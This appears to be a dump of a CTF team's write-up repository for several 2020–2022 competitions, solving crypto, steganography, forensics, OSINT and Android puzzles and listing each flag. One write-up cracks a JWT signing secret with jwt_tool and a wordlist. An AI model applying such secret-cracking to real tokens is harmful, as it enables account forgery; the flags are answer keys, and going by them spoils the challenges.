1 | QEgAAAoDAAAAALxtdFHz9fhaSgAAAEoAAAAIAAAAYmFzZS50eHQ5UkNqNWdVb0VXMTZWOTVSdHc3TDFjSE5FdHNMbzh5blZjS3NQSjZzWkViUHIyVVJmVXZvZVdoZFUzYXFhbmlHVThkY1FCcVhKa1BLAQI/AwoDAAAAALxtdFHz9fhaSgAAAEoAAAAIACQAAAAAAAAAIICkgQAAAABiYXNlLnR4dAoAIAAAAAAAAQAYAIDzxmBtv9YBgPi5pG2/1gGA88Zgbb/WAVBLBQYAAAAAAQABAFoAAABwAAAAAAA=
2 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Base Fun/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Base Fun/screenshot.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Binary or Not/README.md:
--------------------------------------------------------------------------------
1 | # Binary or Not
2 |
3 | **Points:150**\
4 | **Cryptography**
5 |
6 | ```
7 | CipherText : 111111111100100010101011101011111110101111111111011011011011000001101001001001011110010100000000010100110111111111111111111110010100100101111111111111111110010100110110010101001010010010111001010011011110010100100100000000000000000010100000000000000000000000000000000000000000000000000000010101111111111111001010111111100101001111111111111111111111111110010100110000000000010100100100000000000000000000000000000000000010100110111110010100100010100101111111111110010100110110010100100100000000000000000000000000010100110110000000000010100100010100111110010100100100000000000000010100111111001010010111100101011111110010100000000000000000000000000000010101111001010011011000000001010000001010010010000000000000000000001010011000000000000001010010001010011011001010010010111111001010011001010111001010011111001010010010000000000000000000000000001010011011000000000001010010010110010100111111100101001100000000000000000000000000000000000000101001000000000000000000000000000101001011111100101001101111111111111100101001000101011100101001110010100100100000000000000000000010100110111110010100100101111001010111111100101001100000000000101000000000000000000000000101001111111111111111110010100100101111001010
8 | ```
9 |
10 |
11 | >It is spoon programing language.Because it starts with 1111111111.
12 | https://www.dcode.fr/spoon-language
13 |
14 |
15 |
16 | Flag is **hf0x01{3very_0n3_z3r0_3ncrypt10n_n0t_b3l0ng$_t0_b1n4ry_XD}**
17 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Class Bunk Case/FLAG.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Class Bunk Case/FLAG.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Class Bunk Case/README.md:
--------------------------------------------------------------------------------
1 | # Class Bunk Case
2 | **category: OSINT**
3 | **points: 200**
4 |
5 | ## Description
6 | > Because of COVID pandemic my school is doing classes online.
7 | > But I bunked all my classes and know I get warning from my teacher for that
8 | > And when I asked him for notes he send me the link. Will you help me to come out of this case.
9 | > Link : https://docs.google.com/document/d/18J2GYPekm4WX6CiuPSF4L8U6sRoDeWAz1QeNh9pbrNc/edit?usp=sharing
10 | ## Solution
11 | After going to the link we get a note. In the note the word **past** is bolded a couple of times so following the conventional method of solving OSINT challenge, we go to wayback machine. We type the url of the file and we get one screen shot. After looking the screen shot we observed that a new string was added ***74unfgw***. It looked like a code to us.
12 | By *notes* given by the teacher on **google docs**.We predicted that they will be using **google classroom** for their note sharing. Fortunately, the string we got before as the code worked and we got the flag.
13 | 
14 |
15 | FLAG : `hf0x01{Dont_bunk_classes_w3_4r3_pu771ng_3ff0r7$_1n_17}`
16 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/1.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/2.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/3.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/4.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/README.md:
--------------------------------------------------------------------------------
1 | # Do It Man
2 | **category: Android**
3 | **points: 100**
4 |
5 | ## Description
6 | >Not To Hard toJust Do It and Show your All Rounder
7 |
8 | ## Solution
9 | I am a newbie in android.When I face with an android challenge,I use apk editor tool.
10 | First I select challenge apk file
11 |
12 | 
13 | 
14 |
15 | ```I searched with flag format of this ctf.```
16 | 
17 | 
18 |
19 |
20 | ```flag:hf0x01{Y0u_4r3_n0w_B4s1c_4ndr01d}```
21 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Do It Man/chall.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Do It Man/chall.apk
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Fort Mystery/README.md:
--------------------------------------------------------------------------------
1 | # Fort Mystery
2 | **category: Cryptography**
3 | **points: 120**
4 |
5 | ## Description
6 | > Once a wise man said
7 | > Don't compare the people on the basis of size what you compare between a bee and a fort, You have to fight if you want anything in your life there is no comparison
8 | > You have to fight for your dreams and your goals for everything :)
9 | ## Solution
10 | We are provided with a cipher text `yd0j01{l0tyb_i0n_$0ik3f_na3_o0op_4te_s33_tkoo3ch}`. The challenge name looks suspicious so i googled cipher related to it. When i searched for `fort cipher` the first that appeared was `Beaufort Cipher`
11 |
12 | So lets decode this on https://www.dcode.fr/beaufort-cipher. This cipher requires key to solve so i looked up for some words in discription and `fight` works for me
13 |
14 | 
15 |
16 | FLAG : `hf0x01{w0ahh_y0u_$0lv3d_th3_f0rt_4nd_b33_myst3ry}`
17 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Fort Mystery/decodefr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Fort Mystery/decodefr.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mega Sale/flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mega Sale/flag.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mega Sale/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mega Sale/screenshot.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/README.md:
--------------------------------------------------------------------------------
1 | # Mr Robot
2 | **category: Forensics**
3 | **points: 100**
4 |
5 | ## Description
6 | > Elliot : By tonight i am gonna start my hack against E-Corp , after that no more the top 1% of the top 1% no one plays god without permission, nobody gonna control us
7 |
8 | > Darlene : f0xscy help you when you needed
9 |
10 | > Elliot : ok i have to go , prepare for attack
11 |
12 | ## Solution
13 | We are provided with [jpg](mrrobot.jpg) file and size of the file was `19mb` which is too much for just a image. So it was a clear indication that other files are hinding in this file so i used `steghide`,`binwalk`,`foremost` and foremost seems to work for this challenge.
14 |
15 | 
16 |
17 | we got a image and one zip file. There was nothing in the image so i turned to zip file and it was password protected and i remember the discription saying we need this`f0xscy` and it was the password for the zip.
18 |
19 | So now we have two folder, one with many flag.txt files and other one was hidden with having 3 folder in it. All flag.txt file were blank so we are left with 6 images. 3 images were correct and other 3 images have thier headers replaced. Correcting the headers of second image gave us the flag written on the image
20 |
21 | 
22 |
23 | FLAG : `hf0x01{y0u_c4m3_l0ng_w4y_mr_r0b0t_h4ck_w4$_c0mpl3ted}`
24 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/foremost.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/foremost.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/mrrobot.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/mrrobot.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Mr Robot/robot1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Mr Robot/robot1.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/New Encryption/Script.py:
--------------------------------------------------------------------------------
1 | import hashlib
2 | import string
3 |
4 | with open('hash.txt') as f:
5 | fp = f.read()
6 |
7 | md5_sum = ''
8 |
9 | for j in range(0, len(fp), 40):
10 | tmp = fp[j:j+40]
11 | for i in '1234567890abcdef':
12 | letter = hashlib.sha1(i.encode()).hexdigest()
13 | if letter == tmp:
14 | md5_sum += i
15 | # print(md5_sum)
16 |
17 | hsh = []
18 | for j in range(0, len(fp), 32):
19 | hsh.append(md5_sum[j:j+32])
20 |
21 | table = {}
22 |
23 | for i in range(32, 127):
24 | tmp = chr(i)
25 | table[tmp] = hashlib.md5(tmp.encode()).hexdigest()
26 |
27 | l = ''
28 | for i in hsh:
29 | for j, k in table.items():
30 | if i == k:
31 | l += j
32 | print(l)
33 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/README.md:
--------------------------------------------------------------------------------
1 | ## Next Target - Writeup :triangular_flag_on_post:
2 |
3 | -----
4 |
5 | **Category : Cryptography**\
6 | **Points : 100**\
7 | **Author : @l3v1ath4n**
8 |
9 | -----
10 |
11 | #### # Description
12 |
13 | 
14 |
15 |
16 |
17 | #### # Symbols Cipher :balance_scale:
18 |
19 |
20 | 
21 |
22 | Well at first glance the symbols seem to be symbols of `Zodiac`, we can easily find a table of the signs of the same and translate each sign.
23 |
24 | 
25 |
26 | #### # **Flag :**
27 |
28 | ```hf0x01{NEXT_TARGET_WILL_BE_ONE_OF_THE_ADMINS_BUT_YOU_CANT_SAVE_ANYONE}``` :hand:
29 |
30 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/assets/chall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Next Target/assets/chall.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Next Target/assets/next-target.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Next Target/assets/next-target.PNG
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/README.md:
--------------------------------------------------------------------------------
1 | # Note on desk
2 | **category: forensics**
3 | **points: 200**
4 |
5 | ## Description
6 | Our team get information that one hacker group is going to orgainze a meeting and they are planning which can be threat to the nation. So when we raided the house of one on the member of that hacker group we get lot's of pieces of paper on the desk. can you help us to find what is that message
7 |
8 | ## Solution
9 | We get a zip file from the challenge. Inside it is 599 JPGs each with a dimension of 1x600. Here's a python script to concatenate all the images together. The cv2 module can be installed with `pip install opencv-python`.
10 | ```python
11 | import cv2
12 |
13 | images = [cv2.imread('robot-{}.jpg'.format(i)) for i in range(1, 600)]
14 | result = cv2.hconcat(images)
15 | cv2.imwrite('out.jpg', result)
16 | ```
17 | Here we can see the flag inside the image.
18 | 
19 |
20 | **FLAG:** `hf0x01{3nj0y_7h3_3v3ing_w17h_u$}`
21 |
22 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/notes.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Note on desk/notes.zip
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Note on desk/out.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Note on desk/out.jpg
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Vulnfreak CTF 2020
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | **Site** : https://ctf.vulnfreak.com
13 |
14 | **Rank** : 4/81
15 |
16 | 
17 |
18 |
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/logo.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/rank.png
--------------------------------------------------------------------------------
/2021/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/README.md:
--------------------------------------------------------------------------------
1 | # Easy!!!
2 |
3 | **Category**: Misc \
4 | **Points**: 120
5 |
6 | ## Discription
7 |
8 | > A piece of cake for you : )
9 |
10 | ## Solution
11 |
12 | We are given `uggcfzrtnamsvyrJLxJ2LMn#0GK1Iy9IWOfAsRCneIh0MOrNTugF8knPAO-nKX2xE7H` text. I tried some basic things and rot13 worked out
13 |
14 | 
15 |
16 | so we got a `mega.nz` link, i went over to the link and we got [file.txt](file.txt). Looking to file.txt content we know that it is hex encoded but decoding with hex was not working on it. so one of our team mate adviced to reverse the content and it worked out. then i decoded it with hex and we got an image.
17 |
18 | 
19 |
20 | We got a [jpeg file](index.jpeg). Without any doubt i ran steghide on that image and we got [flag.txt](flag.txt)
21 |
22 | FLAG : `cybergrabs{fin4lly_y0u_g07_th3_fl4g_nic3_buddy}`
23 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/cyberchef.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/flag.txt:
--------------------------------------------------------------------------------
1 | cybergrabs{fin4lly_y0u_g07_th3_fl4g_nic3_buddy}
2 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/index.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/index.jpeg
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/rot13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/rot13.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Easy!!!/steghide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Easy!!!/steghide.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Jasper/Jasper.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Jasper/Jasper.jpg
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Jasper/readme.md:
--------------------------------------------------------------------------------
1 | # Jasper
2 |
3 | **Category**: Forensic \
4 | **Points**: 200
5 |
6 | ## Description
7 |
8 | > I like to play with image. Do you?
9 | ## Solution
10 |
11 | Given file is [jpg](Jasper.jpg).
12 | 
13 | Just use `exiftool`` and take a flag.
14 |
15 | # Flag is `cybergrabs{Y0U_4re_g00d_4t_m3ta_DaT4}`
16 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Cybergrab CTF 2021
2 |
3 | **Site** : https://ctf.thecybergrabs.com
4 |
5 | **Rank** : 9/224
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/README.md:
--------------------------------------------------------------------------------
1 | # Wonderful Colours
2 |
3 | **Category**: Misc \
4 | **Points**: 150
5 |
6 | ## Discription
7 |
8 | > I love wonderful Colours.
9 |
10 | ## Solution
11 |
12 | We are given a [png](colourfull.png) file. Looking to it we can see, it has boxes with 6 colors in each box. it is `hexahue code`
13 |
14 | 
15 |
16 | Decode the challenge picture with this table and you will get the flag
17 |
18 | you can get more information about `hexahue code` on https://www.boxentriq.com/code-breaking/hexahue
19 |
20 | FLAG : `cybergrabs{w3h4ck3d1t}`
21 |
22 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/colorcode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Wonderful Colours/colorcode.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/Wonderful Colours/colourful.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/Wonderful Colours/colourful.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/README.md:
--------------------------------------------------------------------------------
1 | # everyone intrested in my secret life ( ᴗ )
2 |
3 | **Category**: Crypto \
4 | **Points**: 150
5 |
6 | ## Discription
7 |
8 | > I Know you want to know the secrets of my life but it is not that much easy. I can only provide you some help you have to figure out it.
9 |
10 | ## Solution
11 |
12 | We are given `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmbGFnIjoiY3liZXJncmFic3tOMHRfVDAwXzM0c1l9In0.I4zPop1KDT55QOE_QlEi-jh5TXg8nRjbnbDwq2VG1M8` text. Decoding it with base64 tell us that, it is jwt token with hs256 algorithm
13 |
14 | 
15 |
16 | After some research on jwt tokens and jwt token cracking. I found a tool https://github.com/ticarpi/jwt_tool. Using it we can break jwt token to get the secret key
17 | so i used it with `rockyou.txt`.
18 |
19 | 
20 |
21 | FLAG : `cybergrabs{perrademierda}`
22 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/base64.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/jwt_tool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/everyone intrested in my secret life ( ᴗ )/jwt_tool.png
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/follow/readme.md:
--------------------------------------------------------------------------------
1 | # Follow
2 |
3 | **Category**: Misc \
4 | **Points**: 100
5 |
6 | ## Discription
7 |
8 | >
9 |
10 | Follow the author.
11 |
12 | flag format: cybergrabs{}
13 |
14 | Author: sc4ry_gh0st
15 |
16 |
17 | ## Solution
18 |
19 | I checked author name "sc4ry_gh0st" in twitter. He has a post ```Hope
20 | thⅰs year wіll be good.
21 | Happy New Year``` . I copied this text and decoded it in this site ```https://holloway.nz/steg/ ```
22 | got this ```tvigt6```
23 | ## Flag is cybergrabs{tvigt6}
24 |
--------------------------------------------------------------------------------
/2021/cybergrab_ctf/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2021/cybergrab_ctf/scoreboard.png
--------------------------------------------------------------------------------
/2022/CybergrabsCTF/README.md:
--------------------------------------------------------------------------------
1 | # CyberGrabs CTF 2022
2 |
3 | **Site**: https://ctf.thecybergrabs.org
4 |
5 | **Rank**: 3/285
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2022/CybergrabsCTF/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/CybergrabsCTF/screenshot.png
--------------------------------------------------------------------------------
/2022/DefCampCTF/README.md:
--------------------------------------------------------------------------------
1 | # DefCamp CTF 21-22
2 |
3 | **Site**: https://dctf21.cyberedu.ro/
4 |
5 | **Rank**: 18/1035
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2022/DefCampCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/DefCampCTF/scoreboard.png
--------------------------------------------------------------------------------
/2022/HayyimCTF/README.md:
--------------------------------------------------------------------------------
1 | # Hayyim CTF 2022
2 |
3 | **Site**: https://ctf.hayyimsecurity.com
4 |
5 | **Rank**: 12/86
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2022/HayyimCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/HayyimCTF/scoreboard.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Digital Forensics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Digital Forensics.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Digital Forensics
2 |
3 | 
4 |
5 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/Lost Flag .png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/Lost Flag .png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/README.md:
--------------------------------------------------------------------------------
1 | # The Lost Flag
2 |
3 | **Category**: Digital Forensic \
4 | **Points**: 25
5 |
6 | ## Description
7 |
8 | > We recovered a image file from an incident. There might be something interesting in the file. Give it a try.
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [Lost Flag.png](Lost%20Flag.png).
14 |
15 | Just use `stegsolve` and see the Red plane 0.
16 |
17 | 
18 |
19 | # Flag is `KCTF{Y0U_F0uNd_M3}`
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{Y0U_F0uNd_M3}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/The Lost Flag/sol.txt:
--------------------------------------------------------------------------------
1 | stegsolve Red plane 0
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/README.md:
--------------------------------------------------------------------------------
1 | # Unknown File
2 |
3 | **Category**: Digital Forensic \
4 | **Points**: 50
5 |
6 | ## Description
7 |
8 | > My friend sent me a file & told me there is a flag in it. He dare me to find the flag. But I have no idea what the file is about. Can you help me get the flag?
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [unknown file.zip](unknown file.zip).
14 |
15 | Unzip the file and got a "unknown file"
16 |
17 |
18 |
19 | Change the Hex signatures of the unknown file(`00 10 56 65` to `89 50 4E 47`).
20 |
21 | 
22 |
23 | # Flag is `KCTF{Imag3_H3ad3r_M4nipul4t10N}`
24 |
25 |
26 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{Imag3_H3ad3r_M4nipul4t10N}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/unknown file:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/unknown file
--------------------------------------------------------------------------------
/2022/KnightCTF/Digital Forensics/Unknown File/unknown file.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Digital Forensics/Unknown File/unknown file.zip
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/1.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/2.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/README.md:
--------------------------------------------------------------------------------
1 | # Look Closely
2 |
3 | **Category**: Misc \
4 | **Points**: 100
5 |
6 | ## Description
7 |
8 | > Look closely & try to find the flag from the following.
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [look closely.wav](look%20clodely.wav).
14 |
15 | Open the wav file using Sonic Visualiser
16 |
17 | In Layer add Spectogram or press `Shift + G` and you'll see a url but its not readable.
18 |
19 | Use the settings shown below and the link will be readable.
20 |
21 | 
22 |
23 | Got https://drive.google.com/file/d/1_6c_waS9ijouTpqI_tUO6VCRf7fE6gCY/view
24 |
25 | In the link I got Watch closely.mp4
26 |
27 | I watched the video carefully and got two binary code.\
28 | First in [00:10 sec](1.png) and Secound in [00:52 sec](2.png)
29 |
30 |
31 | Combine the both binary codes and got `0100101101000011010101000100011001111011010010000011001101001100010011000100111101011111010010100011001101001100010011000100111101111101`
32 |
33 | [Now, just decode it and got the flag.](https://gchq.github.io/CyberChef/#recipe=From_Binary('Space',8)&input=MDEwMDEwMTEwMTAwMDAxMTAxMDEwMTAwMDEwMDAxMTAwMTExMTAxMTAxMDAxMDAwMDAxMTAwMTEwMTAwMTEwMDAxMDAxMTAwMDEwMDExMTEwMTAxMTExMTAxMDAxMDEwMDAxMTAwMTEwMTAwMTEwMDAxMDAxMTAwMDEwMDExMTEwMTExMTEwMQ)
34 | # Flag is `KCTF{H3LLO_J3LLO}`
35 |
36 |
37 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/flag.txt:
--------------------------------------------------------------------------------
1 | KCTF{H3LLO_J3LLO}
2 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/look closely.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/look closely.wav
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Misc/Look Closely/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Misc/Look Closely/settings.png:
--------------------------------------------------------------------------------
